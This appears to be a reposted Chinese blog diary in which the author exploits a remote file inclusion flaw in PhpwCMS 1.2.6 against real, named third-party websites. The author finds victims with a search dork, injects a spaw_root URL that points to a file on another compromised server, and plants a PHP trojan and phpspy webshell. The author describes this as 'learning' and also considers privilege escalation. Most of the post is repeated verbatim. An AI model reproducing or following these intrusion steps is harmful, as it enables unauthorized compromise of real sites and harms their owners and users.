學習利用文件包含漏洞進行網(wǎng)站入侵
發(fā)布日期:2022-01-01 02:12 | 文章來源:gibhub
一、看見漏洞公告
最近想學習一下文件包含漏洞,在無意中看見了關于文件包含的漏洞公告。大致的意思是這樣的,PhpwCMS 1.2.6系統(tǒng)的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php
文件中的$spaw_root的沒有過濾的情況下,包含’**class/lang.class.php’。具體的代碼公告中沒給出來??梢岳孟旅娴膗rl利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的網(wǎng)站,website2是攻擊的網(wǎng)站,website2所在的目錄下有class/lang.class.php文件。
二、學習的第一天
馬上行動,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多項結果,基本上都是國外的。看來這次發(fā)了,這次國外的wenshell肯定是一大堆了。呵呵……,嘿嘿……隨便點擊一個網(wǎng)站,是美國的:http://arena-sv.jans-webdesign.com,不知道這個網(wǎng)站有沒有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/檢測,當然http://www.baidu.com/class/lang.class.php是不存在的,這時頁面顯示如圖一所示,提示沒有找到頁面。這表明了這個網(wǎng)站存在文件包含漏洞,象這樣的有漏洞的網(wǎng)站隨便點擊一個就是。
檢測出有文件包含漏洞
現(xiàn)在開始利用這個漏洞,在我的支持asp網(wǎng)站根目錄建一個class的目錄,在class里面建lang.class.php文件。但是當我用瀏覽器瀏覽http://www.xxxx.xx/class/lang.class.php的時候,提示找不到文件。難道是我的網(wǎng)站所在的服務器沒設置好嗎?我試著找到了幾個webshell,瀏覽的時候還是出現(xiàn)找不到文件的問題。
三、學習的第二天
去搜索的發(fā)現(xiàn)有漏洞的網(wǎng)站變得比較少了,大部分的網(wǎng)站都被漏洞補了,還有一部分美國的網(wǎng)站上被掛了一些與反戰(zhàn)爭有關的圖片或者一些國旗。還好的是昨天的哪個網(wǎng)站沒有被人家黑掉,還有機會學習。我在無意中得到了jsp的wenshell,試著寫了一個php文件,在瀏覽器瀏覽的時候出現(xiàn)的是源文件??磥憩F(xiàn)在現(xiàn)在可以利用這個jsp的webshell來作跳板。
在webshell里面建一個class的文件夾,然后在class目錄里面上傳一個lang.class.php空文件,在文件里面寫上.在瀏覽器上瀏覽http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 顯示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。
php環(huán)境信息
編輯lang.class.php的文件,先寫了一個phpspy。但是登陸webshell的后,頁面轉到其他的頁面。還是先傳一可以上傳的文件的馬兒吧,傳了一個國外的php木馬,木馬的功能很的大,瀏覽http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。
包含的國外php木馬
但是這個國外的php馬還是上傳一個經(jīng)過修改的phpspy吧,用著舒服一點,上傳得文件改為了imge.php,現(xiàn)在訪問http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305,登陸后一臺webshell就在我們的眼前了。權限也不錯,但是由于是linux系統(tǒng),也不知道怎么去提權,還是再放一下吧!
phpspy上傳成功
四、學習的第三天
對linux下的提權一點都不了解,沒辦法只有尋求幫助了。Jinsdb師兄叫我去一些好的網(wǎng)站找一下exp看看,他還告訴我了上次在我的網(wǎng)站中的php文件瀏覽的時候是找不到文件的原因:因為我的系統(tǒng)是2003的,所以要在IIS的ISAPI 篩選器中加.php后綴,在xp下訪問php文件直接就可以瀏覽??磥砩洗挝业玫降姆掌骰旧鲜?003的。
看來這次的學習也蠻有意義的!發(fā)現(xiàn)一點,國外的網(wǎng)站的管理人員比較重視安全。在出現(xiàn)漏洞的第二天,很多網(wǎng)站都把漏洞補了,還有的網(wǎng)站被入侵后能馬上發(fā)現(xiàn),并及時清除了webshell。
最近想學習一下文件包含漏洞,在無意中看見了關于文件包含的漏洞公告。大致的意思是這樣的,PhpwCMS 1.2.6系統(tǒng)的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php
文件中的$spaw_root的沒有過濾的情況下,包含’**class/lang.class.php’。具體的代碼公告中沒給出來??梢岳孟旅娴膗rl利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的網(wǎng)站,website2是攻擊的網(wǎng)站,website2所在的目錄下有class/lang.class.php文件。
二、學習的第一天
馬上行動,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多項結果,基本上都是國外的。看來這次發(fā)了,這次國外的wenshell肯定是一大堆了。呵呵……,嘿嘿……隨便點擊一個網(wǎng)站,是美國的:http://arena-sv.jans-webdesign.com,不知道這個網(wǎng)站有沒有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/檢測,當然http://www.baidu.com/class/lang.class.php是不存在的,這時頁面顯示如圖一所示,提示沒有找到頁面。這表明了這個網(wǎng)站存在文件包含漏洞,象這樣的有漏洞的網(wǎng)站隨便點擊一個就是。
檢測出有文件包含漏洞
現(xiàn)在開始利用這個漏洞,在我的支持asp網(wǎng)站根目錄建一個class的目錄,在class里面建lang.class.php文件。但是當我用瀏覽器瀏覽http://www.xxxx.xx/class/lang.class.php的時候,提示找不到文件。難道是我的網(wǎng)站所在的服務器沒設置好嗎?我試著找到了幾個webshell,瀏覽的時候還是出現(xiàn)找不到文件的問題。
三、學習的第二天
去搜索的發(fā)現(xiàn)有漏洞的網(wǎng)站變得比較少了,大部分的網(wǎng)站都被漏洞補了,還有一部分美國的網(wǎng)站上被掛了一些與反戰(zhàn)爭有關的圖片或者一些國旗。還好的是昨天的哪個網(wǎng)站沒有被人家黑掉,還有機會學習。我在無意中得到了jsp的wenshell,試著寫了一個php文件,在瀏覽器瀏覽的時候出現(xiàn)的是源文件??磥憩F(xiàn)在現(xiàn)在可以利用這個jsp的webshell來作跳板。
在webshell里面建一個class的文件夾,然后在class目錄里面上傳一個lang.class.php空文件,在文件里面寫上.在瀏覽器上瀏覽http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 顯示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。
php環(huán)境信息
編輯lang.class.php的文件,先寫了一個phpspy。但是登陸webshell的后,頁面轉到其他的頁面。還是先傳一可以上傳的文件的馬兒吧,傳了一個國外的php木馬,木馬的功能很的大,瀏覽http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。
包含的國外php木馬
但是這個國外的php馬還是上傳一個經(jīng)過修改的phpspy吧,用著舒服一點,上傳得文件改為了imge.php,現(xiàn)在訪問http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305,登陸后一臺webshell就在我們的眼前了。權限也不錯,但是由于是linux系統(tǒng),也不知道怎么去提權,還是再放一下吧!
phpspy上傳成功
四、學習的第三天
對linux下的提權一點都不了解,沒辦法只有尋求幫助了。Jinsdb師兄叫我去一些好的網(wǎng)站找一下exp看看,他還告訴我了上次在我的網(wǎng)站中的php文件瀏覽的時候是找不到文件的原因:因為我的系統(tǒng)是2003的,所以要在IIS的ISAPI 篩選器中加.php后綴,在xp下訪問php文件直接就可以瀏覽??磥砩洗挝业玫降姆掌骰旧鲜?003的。
看來這次的學習也蠻有意義的!發(fā)現(xiàn)一點,國外的網(wǎng)站的管理人員比較重視安全。在出現(xiàn)漏洞的第二天,很多網(wǎng)站都把漏洞補了,還有的網(wǎng)站被入侵后能馬上發(fā)現(xiàn),并及時清除了webshell。
版權聲明:本站文章來源標注為YINGSOO的內容版權均為本站所有,歡迎引用、轉載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內容涉嫌侵權,請聯(lián)系alex-e#qq.com處理。
相關文章